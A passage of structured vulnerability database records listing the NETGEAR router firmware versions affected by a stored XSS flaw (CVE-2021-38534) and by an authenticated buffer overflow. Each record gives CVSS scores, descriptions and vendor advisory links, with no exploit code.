"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6260_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16D72B7A-0707-428F-A9AE-5899EBF4BBA0",
"versionEndExcluding": "1.1.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6260:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3C395D49-57F9-4BC1-8619-57127355B86B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CC022BD-49D5-442A-B76D-663923A52B8D",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BF91E85-8869-4421-8748-C7856C06435B",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91532716-831D-401C-8707-86785F0A4E16",
"versionEndExcluding": "1.0.2.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6FD0FE-1431-4E39-8D07-B4AFE5BDB1B6",
"versionEndExcluding": "1.0.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4A4FB8A1-D380-4234-88EB-91BFF6D215C7",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "73CE0588-37C3-48C1-B013-3277CCE4EF98",
"versionEndExcluding": "1.0.2.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "5A09A9E8-8C77-4EDB-9483-B3C540EF083A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C39CE79-6433-47E2-A439-9AB1DFBD843C",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E921ACD-4ED9-4FFD-AF96-F2E1D75F8C96",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB6992BA-B0F5-4E00-84F4-0B0336910AFA",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2464BFFA-401B-48F9-B326-15F306F927FF",
"versionEndExcluding": "1.0.9.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0870C337-6BCE-4197-A9DE-6CED2B45AD58",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F168C3F8-F77C-4918-A752-9A04CED2349E",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7450_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "153A698C-B517-4B5B-B7AB-D2A50F461213",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7450:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6DA5420D-DD64-4A9C-9B5F-784F0ED2B464",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845CF217-8361-4D5B-811D-B9CEB68880CB",
"versionEndExcluding": "1.0.3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B02CB0A-BBB8-4A64-93B3-7CA1DF7B7299",
"versionEndExcluding": "1.4.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98FAEBDA-5FBA-402D-9BA1-25E5DF4EF55F",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D3F1622-F2B7-41F0-87F0-61F4ACB270C8",
"versionEndExcluding": "1.4.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA0360C1-5AA1-42CC-BBC8-EB0D96EF98CF",
"versionEndExcluding": "1.0.2.130",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E3CD6231-9CB0-47B1-BA7A-75B2E452C9FE",
"versionEndExcluding": "1.0.2.130",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A8D88D16-F42A-412D-81A6-BD6CA2E08595",
"versionEndExcluding": "1.0.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0141851-BE96-4F6A-883F-3B20AE6945C1",
"versionEndExcluding": "1.1.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1748207-4BAA-4CC2-AD44-19D895B1C08B",
"versionEndExcluding": "1.2.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr450_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1DF16407-DB09-4174-A435-F7AF209E4260",
"versionEndExcluding": "2.3.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr450:-:*:*:*:*:*:*:*",
"matchCriteriaId": "66B9CE4D-D1EC-4F55-8226-D159CF5F3AB6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8752321F-E9BF-427B-88FD-B67014FB2FD5",
"versionEndExcluding": "2.3.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9E203D92-F97B-4F5B-B395-3A5DEDBF1C1C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un ataque de tipo XSS almacenado. Esto afecta a D3600 versiones anteriores a 1.0.0.76, D6000 versiones anteriores a 1.0.0.76, D6100 versiones anteriores a 1.0.0.60, D6200 versiones anteriores a 1.1.00.36, D6220 versiones anteriores a 1.0.0.52, D6400 versiones anteriores a 1.0.0. 86, D7000 versiones anteriores a 1.0.1.70, D7000v2 versiones anteriores a 1.0.0.53, D8500 versiones anteriores a 1.0.3.44, DC112A versiones anteriores a 1.0.0.42, DGN2200v4 versiones anteriores a 1.0.0.110, DGND2200Bv4 versiones anteriores a 1. 0.0.109, DM200 versiones anteriores a 1.0.0.61, JR6150 versiones anteriores a 1.0.1.18, PR2000 versiones anteriores a 1.0.0.28, R6020 versiones anteriores a 1.0.0.42, R6050 versiones anteriores a 1.0.1.18, R6080 versiones anteriores a 1. 0.0.42, R6220 versiones anteriores a 1.1.0.80, R6230 versiones anteriores a 1.1.0.80, R6250 versiones anteriores a 1.0.4.34, R6260 versiones anteriores a 1.1.0.64, R6300v2 versiones anteriores a 1.0.4.34, R6400 versiones anteriores a 1.0.1. 46, R6400v2 versiones anteriores a 1.0.2.62, R6700 versiones anteriores a 1.0.2.6, R6700v2 versiones anteriores a 1.2.0.36, R6700v3 versiones anteriores a 1.0.2.62, R6800 versiones anteriores a 1.2.0.36, R6900 versiones anteriores a 1.0.2. 4, R6900P versiones anteriores a 1.3.1.64, R6900v2 versiones anteriores a 1.2.0.36, R7000 versiones anteriores a 1.0.9.60, R7000P versiones anteriores a 1.3.1.64, R7100LG versiones anteriores a 1.0.0.50, R7300DST versiones anteriores a 1.0.0. 70, R7450 versiones anteriores a 1.2.0.36, R7900 versiones anteriores a 1.0.3.8, R7900P versiones anteriores a 1.4.1.50, R8000 versiones anteriores a 1.0.4.28, R8000P versiones anteriores a 1.4.1.50, R8300 versiones anteriores a 1.0.2. 130, R8500 versiones anteriores a 1.0.2.130, WNDR3400v3 versiones anteriores a 1.0.1.24, WNR2020 versiones anteriores a 1.1.0.62, WNR3500Lv2 versiones anteriores a 1.2.0.62, XR450 versiones anteriores a 2.3.2.40 y XR500 versiones anteriores a 2.3.2.40"
}
],
"id": "CVE-2021-38534",
"lastModified": "2024-11-21T06:17:21.960",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 3.4,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-08-11T00:17:22.217",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "061389AF-C8DA-48DF-8D7E-014A9B8D5D09",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB24F17D-A9A8-4EF9-BF53-580395D60EFC",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72004304-314A-4BE6-A33E-7F4CDF01FCEF",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE696277-6FBD-4345-B372-FA375B0F763B",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dm200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7DEE689F-923A-414C-B048-E4716DA2B783",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dm200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1B048F71-70F1-4D9F-84E2-9F7340F6ADAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jndr3000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ACE7B01B-A02D-4B45-B61C-D61D8CFD52C1",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jndr3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEEEEE5-0798-450E-BF9D-B17A15235C80",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbk50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B7ED1541-DE7D-4A4C-B8D1-CB42E52E3DBE",
"versionEndExcluding": "2.3.5.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbk50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA66D07-D017-49D6-8E72-5C48E940DE1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094B04D5-9063-4D7A-B367-E1F2688B3667",
"versionEndExcluding": "2.3.5.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
